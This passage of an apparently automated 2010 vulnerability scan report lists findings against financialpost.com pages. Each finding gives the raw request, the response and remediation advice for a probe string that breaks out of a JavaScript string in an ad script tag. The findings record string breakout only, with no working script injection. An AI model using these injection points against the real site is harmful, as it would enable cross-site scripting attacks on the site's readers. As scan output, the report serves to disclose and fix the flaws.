Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71329
Expires: Sun, 19 Dec 2010 03:12:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/leadership-companies-honest-with-their-employees/398715143db7';7532e4f4caa/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=leadership-companies-honest-with-their-employees;kw=398715143db7';7532e4f4caa;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTa
...[SNIP]...

1.88. http://www.financialpost.com/executive/Leadership+companies+honest+with+their+employees/3987151/story.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/Leadership+companies+honest+with+their+employees/3987151/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69f5d'%3bbfa9b0eb109 was submitted in the REST URL parameter 4. This input was echoed as 69f5d';bfa9b0eb109 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive/Leadership+companies+honest+with+their+employees/3987151/69f5d'%3bbfa9b0eb109 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44711


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/leadership%20companies%20honest%20with%20their%20employees/3987151/69f5d';bfa9b0eb109/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=leadership%20companies%20honest%20with%20their%20employees;kw=3987151;kw=69f5d';bfa9b0eb109;kw=npo;kw=fpo;tile='+dartad_tile+
...[SNIP]...

1.89. http://www.financialpost.com/executive/Leadership+make+good+decisions/3957410/story.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/Leadership+make+good+decisions/3957410/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7cd1'%3b8a87ca5dda7 was submitted in the REST URL parameter 1. This input was echoed as a7cd1';8a87ca5dda7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executivea7cd1'%3b8a87ca5dda7/Leadership+make+good+decisions/3957410/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 79991
Expires: Sun, 19 Dec 2010 03:12:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executivea7cd1';8a87ca5dda7/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executivea7cd1';8a87ca5dda7;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=33160721?">
...[SNIP]...

1.90. http://www.financialpost.com/executive/Leadership+make+good+decisions/3957410/story.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/Leadership+make+good+decisions/3957410/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea152'%3b5875384a269 was submitted in the REST URL parameter 3. This input was echoed as ea152';5875384a269 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive/Leadership+make+good+decisions/3957410ea152'%3b5875384a269/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69799
Expires: Sun, 19 Dec 2010 03:12:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/leadership-make-good-decisions/3957410ea152';5875384a269/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=leadership-make-good-decisions;kw=3957410ea152';5875384a269;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord
...[SNIP]...

1.91. http://www.financialpost.com/executive/Leadership+make+good+decisions/3957410/story.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/Leadership+make+good+decisions/3957410/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bacb0'%3b92563dfa8ca was submitted in the REST URL parameter 4. This input was echoed as bacb0';92563dfa8ca in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive/Leadership+make+good+decisions/3957410/bacb0'%3b92563dfa8ca HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 45046


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/leadership%20make%20good%20decisions/3957410/bacb0';92563dfa8ca/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=leadership%20make%20good%20decisions;kw=3957410;kw=bacb0';92563dfa8ca;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surrou
...[SNIP]...

1.92. http://www.financialpost.com/executive/Organizations+fight+bureaucracy/3992875/story.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/Organizations+fight+bureaucracy/3992875/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae28c'%3bc70cc79a0a1 was submitted in the REST URL parameter 1. This input was echoed as ae28c';c70cc79a0a1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executiveae28c'%3bc70cc79a0a1/Organizations+fight+bureaucracy/3992875/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 88315
Expires: Sun, 19 Dec 2010 03:12:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executiveae28c';c70cc79a0a1/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executiveae28c';c70cc79a0a1;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=99274053?">
...[SNIP]...

1.93. http://www.financialpost.com/executive/Organizations+fight+bureaucracy/3992875/story.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/Organizations+fight+bureaucracy/3992875/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c87f'%3bc33c1d433bd was submitted in the REST URL parameter 3. This input was echoed as 2c87f';c33c1d433bd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive/Organizations+fight+bureaucracy/39928752c87f'%3bc33c1d433bd/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 63883
Expires: Sun, 19 Dec 2010 03:12:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/organizations-fight-bureaucracy/39928752c87f';c33c1d433bd/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=organizations-fight-bureaucracy;kw=39928752c87f';c33c1d433bd;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'or
...[SNIP]...

1.94. http://www.financialpost.com/executive/Organizations+fight+bureaucracy/3992875/story.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/Organizations+fight+bureaucracy/3992875/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c799'%3bc87820a0f13 was submitted in the REST URL parameter 4. This input was echoed as 2c799';c87820a0f13 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive/Organizations+fight+bureaucracy/3992875/2c799'%3bc87820a0f13 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44205


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/organizations%20fight%20bureaucracy/3992875/2c799';c87820a0f13/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=organizations%20fight%20bureaucracy;kw=3992875;kw=2c799';c87820a0f13;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroun
...[SNIP]...

1.95. http://www.financialpost.com/executive/canadian-mba-programs/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/canadian-mba-programs/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b293e'%3b061095bc4ca was submitted in the REST URL parameter 1. This input was echoed as b293e';061095bc4ca in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executiveb293e'%3b061095bc4ca/canadian-mba-programs/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43656


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executiveb293e';061095bc4ca/canadian-mba-programs/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executiveb293e';061095bc4ca;kw=canadian-mba-programs;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'o
...[SNIP]...

1.96. http://www.financialpost.com/executive/canadian-mba-programs/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/canadian-mba-programs/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8f55'%3bcca8fb45330 was submitted in the REST URL parameter 2. This input was echoed as e8f55';cca8fb45330 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive/canadian-mba-programse8f55'%3bcca8fb45330/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44440


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/canadian-mba-programse8f55';cca8fb45330/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=canadian-mba-programse8f55';cca8fb45330;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=18233465?">
...[SNIP]...

1.97. http://www.financialpost.com/executive/ceo/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/ceo/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98aba'%3bb9fb836393d was submitted in the REST URL parameter 1. This input was echoed as 98aba';b9fb836393d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive98aba'%3bb9fb836393d/ceo/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37452


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive98aba';b9fb836393d/ceo/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive98aba';b9fb836393d;kw=ceo;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=75987676?">
...[SNIP]...

1.98. http://www.financialpost.com/executive/ceo/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/ceo/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9721'%3b486d1a1eccd was submitted in the REST URL parameter 2. This input was echoed as e9721';486d1a1eccd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive/ceoe9721'%3b486d1a1eccd/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37416


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/ceoe9721';486d1a1eccd/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=ceoe9721';486d1a1eccd;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=47736748?">
...[SNIP]...

1.99. http://www.financialpost.com/executive/hr/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/hr/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2a5c'%3bdbe23d485fd was submitted in the REST URL parameter 1. This input was echoed as d2a5c';dbe23d485fd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executived2a5c'%3bdbe23d485fd/hr/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43275


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executived2a5c';dbe23d485fd/hr/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executived2a5c';dbe23d485fd;kw=hr;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=83164053?">
...[SNIP]...

1.100. http://www.financialpost.com/executive/hr/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/hr/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c50a'%3b34e2fdea153 was submitted in the REST URL parameter 2. This input was echoed as 1c50a';34e2fdea153 in the application's response.

